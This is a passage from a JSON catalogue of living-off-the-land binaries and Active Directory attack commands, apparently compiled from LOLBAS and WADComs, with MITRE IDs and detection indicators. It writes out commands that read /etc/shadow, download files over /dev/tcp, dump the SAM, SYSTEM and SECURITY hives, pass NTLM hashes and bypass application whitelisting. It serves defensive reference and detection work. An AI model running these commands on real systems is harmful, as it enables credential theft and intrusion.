sandbox, copying payloads from the sandbox back to the host system (seen here), or for accessing arbitrary host system files by the sandbox.","usecase":"Fileless execution of arbitrary commands in an EDR-free environment, with access to files on the host system, while the host-side process tree is masked by the Sandbox client binaries.","mitre":["T1564.006"],"privilege":"user","fullPath":["C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\wsb.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"wsb.exe command line containing --config with an embedded <LogonCommand> XML element"},{"type":"IOC","value":"wsb.exe command line invoking the share subcommand with --allow-write"},{"type":"IOC","value":"wsb.exe command line invoking the exec subcommand with -r System"},{"type":"IOC","value":"WindowsSandboxServer.exe spawns whenever a Sandbox session starts, regardless of whether anyone connects. Lives under %ProgramFiles%\\WindowsApps\\MicrosoftWindows.WindowsSandbox_*\\."},{"type":"IOC","value":"WindowsSandboxRemoteSession.exe spawns ONLY when an RDP connection to the Sandbox is established - opening a .wsb file directly auto-connects (so both processes appear), but `wsb start` alone does NOT spawn it. Its absence while WindowsSandboxServer.exe is alive means no user has connected."},{"type":"IOC","value":"(highest-signal for headless abuse) WindowsSandboxServer.exe present WITHOUT WindowsSandboxRemoteSession.exe indicates a Sandbox VM is running with no interactive session. Legitimate usage almost always involves an RDP connection (because users want to use the Sandbox); a server-without-remote-session state is consistent with the `wsb exec -r System` headless attack primitive."},{"type":"IOC","value":"vmwp.exe and vmmemWindowsSandbox spawned alongside wsb.exe activity indicate the Sandbox VM is up (vmwp is the Hyper-V worker hosting the Sandbox VM)"},{"type":"IOC","value":"Host-side file-creation events on paths corresponding to a mapped folder, attributed to vmwp.exe (Hyper-V worker), with timestamps inside the lifetime of an active Sandbox session - empirically verified on Windows 11 24H2 via Process Monitor; this is how a sandbox-to-host cross-boundary write surfaces from host telemetry"},{"type":"IOC","value":"Microsoft-Windows-Sandbox-Client-Diagnostics/Admin event log entries for Sandbox lifecycle events correlated with wsb.exe invocations"}],"references":["https://web.archive.org/web/20250116184008/http://blog.syscall.party/2020/12/02/weaponizing-windows-sandbox.html","https://github.com/LloydLabs/wsb-detect","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-cli","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-versions","https://github.com/secdev02/SandBoxShenanigans","https://lolbas-project.github.io/lolbas/OtherMSBinaries/wsb/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wsl-exe:0","toolId":"lolbas:wsl-exe","toolName":"Wsl.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsl.exe -e /mnt/c/Windows/System32/calc.exe","description":"Executes calc.exe from wsl.exe","usecase":"Performs execution of specified file, can be used to execute arbitrary Linux commands.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wsl.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Child process from wsl.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://twitter.com/nas_bench/status/1535431474429808642","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wsl-exe:1","toolId":"lolbas:wsl-exe","toolName":"Wsl.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsl.exe -u root -e cat /etc/shadow","description":"Cats /etc/shadow file as root","usecase":"Performs execution of arbitrary Linux commands as root without need for password.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wsl.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Child process from wsl.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://twitter.com/nas_bench/status/1535431474429808642","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wsl-exe:2","toolId":"lolbas:wsl-exe","toolName":"Wsl.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsl.exe --exec bash -c \"{CMD}\"","description":"Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)","usecase":"Performs execution of arbitrary Linux commands.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wsl.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Child process from wsl.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://twitter.com/nas_bench/status/1535431474429808642","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wsl-exe:3","toolId":"lolbas:wsl-exe","toolName":"Wsl.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'","description":"Downloads file from 192.168.1.10","usecase":"Download file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wsl.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Child process from wsl.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://twitter.com/nas_bench/status/1535431474429808642","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wsl-exe:4","toolId":"lolbas:wsl-exe","toolName":"Wsl.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsl.exe","description":"When executed, `wsl.exe` queries the registry value of `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Lxss\\MSI\\InstallLocation`, which contains a folder path (`c:\\program files\\wsl` by default). If the value points to another folder containing a file named `wsl.exe`, it will be executed instead of the legitimate `wsl.exe` in the program files folder.","usecase":"Execute a payload as a child process of `bash.exe` while masquerading as WSL.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wsl.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Child process from wsl.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://twitter.com/nas_bench/status/1535431474429808642","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:xbootmgr-exe:0","toolId":"lolbas:xbootmgr-exe","toolName":"XBootMgr.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"xbootmgr.exe -trace \"{boot|hibernate|standby|shutdown|rebootCycle}\" -callBack {PATH:.exe}","description":"Executes an executable after the trace is complete using the callBack parameter.","usecase":"Executes code as part of post-trace automation flow.","mitre":["T1202"],"privilege":"admin","fullPath":["C:\\Program Files\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/previous-versions/windows/desktop/xperf/reference","https://lolbas-project.github.io/lolbas/OtherMSBinaries/XBootMgr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:xbootmgr-exe:1","toolId":"lolbas:xbootmgr-exe","toolName":"XBootMgr.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"xbootmgr.exe -trace \"{boot|hibernate|standby|shutdown|rebootCycle}\" -preTraceCmd {PATH:.exe}","description":"Executes an executable before each trace run using the preTraceCmd parameter.","usecase":"Executes code as part of pre-trace automation or staging.","mitre":["T1202"],"privilege":"admin","fullPath":["C:\\Program Files\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/previous-versions/windows/desktop/xperf/reference","https://lolbas-project.github.io/lolbas/OtherMSBinaries/XBootMgr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:xbootmgrsleep-exe:0","toolId":"lolbas:xbootmgrsleep-exe","toolName":"XBootMgrSleep.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"xbootmgrsleep.exe 1000 {PATH:.exe}","description":"Execute executable via XBootMgrSleep, with a 1 second (=1000 milliseconds) delay. Alternatively, it is also possible to replace the delay with any string for immediate execution.","usecase":"Performs execution of specified executable, can be used as a defense evasion","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Program Files\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgrsleep.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgrsleep.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/previous-versions/windows/desktop/xperf/reference","https://lolbas-project.github.io/lolbas/OtherMSBinaries/XBootMgrSleep/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:devtunnel-exe:0","toolId":"lolbas:devtunnel-exe","toolName":"devtunnel.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"devtunnel.exe host -p 8080","description":"Enabling a forwarded port for locally hosted service at port 8080 to be exposed on the internet.","usecase":"Download Files, Upload Files, Data Exfiltration","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Temp\\.net\\devtunnel\\devtunnel.exe","C:\\Users\\<username>\\AppData\\Local\\Temp\\DevTunnels\\devtunnel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/dns_query/dns_query_win_devtunnels_communication.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/network_connection/net_connection_win_domain_devtunnels.yml"},{"type":"IOC","value":"devtunnel.exe binary spawned"},{"type":"IOC","value":"*.devtunnels.ms"},{"type":"IOC","value":"*.*.devtunnels.ms"},{"type":"Analysis","value":"https://cydefops.com/vscode-data-exfiltration"}],"references":["https://code.visualstudio.com/docs/editor/port-forwarding","https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnel/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:dotnet-counters-exe:0","toolId":"lolbas:dotnet-counters-exe","toolName":"dotnet-counters.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dotnet-counters.exe collect --duration 1 -- {PATH:.exe}","description":"Launches the specified executable as a child process while collecting performance counter data for 1 second.","usecase":"Execute a child process under the guise of a legitimate .NET diagnostic tool.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Users\\<user>\\.dotnet\\tools\\dotnet-counters.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Process creation with command line containing \"dotnet-counters collect\" and \"--\""}],"references":["https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-counters","https://github.com/dotnet/diagnostics","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dotnet-counters/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:dotnet-trace-exe:0","toolId":"lolbas:dotnet-trace-exe","toolName":"dotnet-trace.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dotnet-trace.exe collect --duration 00:00:01 -- {PATH:.exe}","description":"Launches the specified executable as a child process while collecting runtime trace data for 1 second during execution.","usecase":"Execute a child process under the guise of a legitimate .NET diagnostic tool.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Users\\<user>\\.dotnet\\tools\\dotnet-trace.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Process creation with command line containing \"dotnet-trace collect\" and \"--\""}],"references":["https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-trace","https://github.com/dotnet/diagnostics","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dotnet-trace/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:vsls-agent-exe:0","toolId":"lolbas:vsls-agent-exe","toolName":"vsls-agent.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"vsls-agent.exe --agentExtensionPath {PATH_ABSOLUTE:.dll}","description":"Load a library payload using the --agentExtensionPath parameter (32-bit)","usecase":"Execute proxied payload with Microsoft signed binary","mitre":["T1218"],"privilege":"user","fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\Extensions\\Microsoft\\LiveShare\\Agent\\vsls-agent.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml"}],"references":["https://twitter.com/bohops/status/1583916360404729857","https://lolbas-project.github.io/lolbas/OtherMSBinaries/vsls-agent/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:vstest-console-exe:0","toolId":"lolbas:vstest-console-exe","toolName":"vstest.console.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"vstest.console.exe {PATH:.dll}","description":"VSTest functionality may allow an adversary to executes their malware by wrapping it as a test method then build it to a .exe or .dll file to be later run by vstest.console.exe. This may both allow AWL bypass or defense bypass in general","usecase":"Proxy Execution and AWL bypass, Adversaries may run malicious code embedded inside the test methods of crafted dll/exe","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\TestAgent\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"vstest.console.exe spawning unexpected processes"}],"references":["https://learn.microsoft.com/en-us/visualstudio/test/vstest-console-options?view=vs-2022","https://lolbas-project.github.io/lolbas/OtherMSBinaries/vstest.console/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:winfile-exe:0","toolId":"lolbas:winfile-exe","toolName":"winfile.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"winfile.exe {PATH:.exe}","description":"Execute an executable file with WinFile as a parent process.","usecase":"Performs execution of specified file, can be used as a defense evasion","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\winfile.exe","C:\\Windows\\winfile.exe","C:\\Program Files\\WinFile\\winfile.exe","C:\\Program Files (x86)\\WinFile\\winfile.exe","C:\\Program Files\\WindowsApps\\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\\WinFile\\winfile.exe"],"toolType":"OtherMSBinary","references":["https://github.com/microsoft/winfile","https://lolbas-project.github.io/lolbas/OtherMSBinaries/winfile/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:xsd-exe:0","toolId":"lolbas:xsd-exe","toolName":"xsd.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"xsd.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\bin\\NETFX <version> Tools\\xsd.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"URL on a xsd.exe command line"},{"type":"IOC","value":"xsd.exe making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/xsd/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"wadcoms:ADCSEnumaration","toolId":"wadcoms:ADCSEnumaration","toolName":"ADCSEnumaration","name":"ADCSEnumaration","source":"WADComs","platform":["Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"#Note that we are just enumarating here. We are not preforming exploitation. There is a linux equalivent called certipy that works much the same way\n# Find CAs \nC:Tools\\Certify.exe cas \n\n# Find templates\nC:Tools\\Certify.exe find \n\n# Find vulnerable templates\nC:Tools\\Certify.exe find /vulnerable","description":"Active Directory Certifcate Services or ADCS provide an alternative way to authenticate within a AD enviroment that contains a PKI as well as \nbeing configured with a Certifcate Authority. References below will provide technical info on ADCS as well as exploitation techniques from \nspectorops certfied preowned white paper.\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/Certify","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/adcs/"],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:BloodHound.py-Remote-Ingestion-Creds","toolId":"wadcoms:BloodHound.py","toolName":"BloodHound.py","name":"BloodHound.py-Remote-Ingestion-Creds","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"bloodhound.py -u john -p password123 -d test.local -v --zip -c All -dc test.local -ns 10.10.10.1","description":"BloodHound is a single page Javascript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment.\n\nBloodHound.py is a Python based ingestor for BloodHound, based on Impacket. It allows you to remotely collect data for bloodhound by querying LDAP\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain: test.local\n","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/BloodHoundAD/BloodHound","https://github.com/fox-it/BloodHound.py"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:BloodHound.py-Remote-Ingestion","toolId":"wadcoms:BloodHound.py","toolName":"BloodHound.py","name":"BloodHound.py-Remote-Ingestion","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"bloodhound.py -d test.local -v --zip -c All -dc test.local -ns 10.10.10.1","description":"BloodHound is a single page Javascript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment.\n\nBloodHound.py is a Python based ingestor for BloodHound, based on Impacket. It allows you to remotely collect data for bloodhound by querying LDAP\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n","mitre":[],"requires":["No credentials"],"services":["LDAP"],"references":["https://github.com/BloodHoundAD/BloodHound","https://github.com/fox-it/BloodHound.py"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:CredDumpWithoutMimilkatz","toolId":"wadcoms:CredDumpWithoutMimilkatz","toolName":"CredDumpWithoutMimilkatz","name":"CredDumpWithoutMimilkatz","source":"WADComs","platform":["Windows","Linux"],"capability":[],"nativeCategory":[],"command":"# The following command will dump the SAM, SYSTEM, and SECURITY hives to the current directory.\nreg save HKLM\\SAM sam.hive\nreg save HKLM\\SYSTEM system.hive\nreg save HKLM\\SECURITY security.hive\n\n#Assuming you have transfered the hives to your kali\nsamdump2 system sam \n\n#We can also get lsa secrets via mimikatz\nlsadump::secrets /system:c:\\temp\\system.hive /security:c:\\temp\\security.hive","description":"The lsass Process while great, is no where neaar the only way to dump credintials from windows. One of which is access the three registry hives:\nSAM, SYSTEM, and SECURITY. This is a method that can be used to dump credentials without mimikatz as well as offer some potenial stealth. \n","mitre":[],"requires":["Shell"],"references":["https://www.ired.team/offensive-security/credential-access-and-credential-dumping","https://www.synacktiv.com/en/publications/lsa-secrets-revisiting-secretsdump"],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Dementor","toolId":"wadcoms:Dementor","toolName":"Dementor","name":"Dementor","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 dementor.py -u john -p password123 -d test.local 10.10.10.2 10.10.10.1","description":"dementor.py interacts with the printer spooler on a host to trigger an authentication from the target IP to an attacker controlled host (usually an SMB or HTTP server). This captured authentication can then be relayed to authenticated to other hosts. See more in ntlmrelayx.py.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC","NTLM"],"references":["https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Enum4Linux-Creds","toolId":"wadcoms:Enum4Linux","toolName":"Enum4Linux","name":"Enum4Linux-Creds","source":"WADComs","platform":["Linux"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"enum4linux -u john -p password123 -a 10.10.10.1","description":"Enum4Linux is a tool for enumerating information from Windows and Samba systems, using a number of different techniques. The following command will attempt to enumerate information provided valid login credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"references":["https://github.com/CiscoCXSecurity/enum4linux"],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Enum4Linux-NoCreds","toolId":"wadcoms:Enum4Linux","toolName":"Enum4Linux","name":"Enum4Linux-NoCreds","source":"WADComs","platform":["Linux"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"enum4linux -a 10.10.10.1","description":"Enum4Linux is a tool for enumerating information from Windows and Samba systems, using a number of different techniques. The following command will attempt to enumerate information using no credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No credentials"],"references":["https://github.com/CiscoCXSecurity/enum4linux"],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Evil-WinRM-PTH","toolId":"wadcoms:Evil","toolName":"Evil","name":"Evil-WinRM-PTH","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"evil-winrm -i 10.10.10.1 -u john -H c23b2e293fa0d312de6f59fd6d58eae3","description":"Evil-WinRM uses the Windows Management Instrumentation (WMI) to give you an interactive shell on the Windows host. Evil-WinRM supports passing the victim's NT hash for authorization.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tNT Hash: c23b2e293fa0d312de6f59fd6d58eae3\n","mitre":[],"requires":["Username","NTLM hash"],"services":["WMI"],"references":["https://github.com/Hackplayers/evil-winrm"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Evil-WinRM","toolId":"wadcoms:Evil","toolName":"Evil","name":"Evil-WinRM","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"evil-winrm -i 10.10.10.1 -u john -p password123","description":"Evil-WinRM uses the Windows Management Instrumentation (WMI) to give you an interactive shell on the Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["WMI"],"references":["https://github.com/Hackplayers/evil-winrm"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Evil-Winrm-PKINIT","toolId":"wadcoms:Evil","toolName":"Evil","name":"Evil-Winrm-PKINIT","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"evil-winrm -i 10.10.10.1 -c pub.pem -k priv.pem -S -r EVILCORP","description":"Evil-WinRM uses the Windows Management Instrumentation (WMI) to give you an interactive shell on the Windows host. Winrm Supports PKINIT, meaning if you have a computers PFX file, you can authenticate and get a shell. Note that the command requires a public and a private key in PEM format, that can be extracted by converting the PFX to PEM format. Take a look at the references for more info on that. Password protected PFX files can be cracked with JohnTheRipper.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tPFX File: cert.pfx\n\n\tDomain: EVILCORP\n","mitre":[],"requires":["Certificate"],"services":["WMI"],"references":["https://github.com/Hackplayers/evil-winrm","https://book.hacktricks.xyz/cryptography/certificates"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:FindUncommonShares","toolId":"wadcoms:FindUncommonShares","toolName":"FindUncommonShares","name":"FindUncommonShares","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 FindUncommonShares.py -u 'john' -d 'TEST.local' -p 'password123' --dc-ip 10.10.10.1","description":"The script FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username","NTLM hash"],"services":["SMB"],"references":["https://github.com/p0dalirius/FindUncommonShares"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed 